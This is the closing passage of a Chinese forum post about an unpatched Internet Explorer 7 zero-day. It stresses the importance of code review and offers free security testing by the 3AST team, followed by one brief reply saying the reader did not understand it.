Microsoft在12月份已经连续发布了多个安全漏洞和补丁,网管人员现在疲于应付补丁情况。而这次的IE7 0day到今天还没有公布安全补丁,这也充分证明了代码设计人员在代码写出来之后从事代码校验和检查是一件多么重要的事情。Microsoft作为一个著名的国际大公司在代码安全上已经很注重检查和跟踪了,尚且出了这么多次安全漏洞,我们国内的一些公司在代码审核上基本上毫不设防,值得我们深思!!![size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
本次分析只是一次简单的分析和测试,由于水平有限,没有深入的跟踪下去,如有不当之处希望大家多多指教,也希望欢迎大家多多提供安全线索,俺以及3AST安全365团队(antian365.com)将免费为您进行安全检测。谢谢大家耐心看完本文,不到之处请指正。[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]

eyoucgt 发表于 2009-11-5 10:32

[i=s] 本帖最后由 eyoucgt 于 2010-11-16 14:25 编辑 [/i]

看不懂,over

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.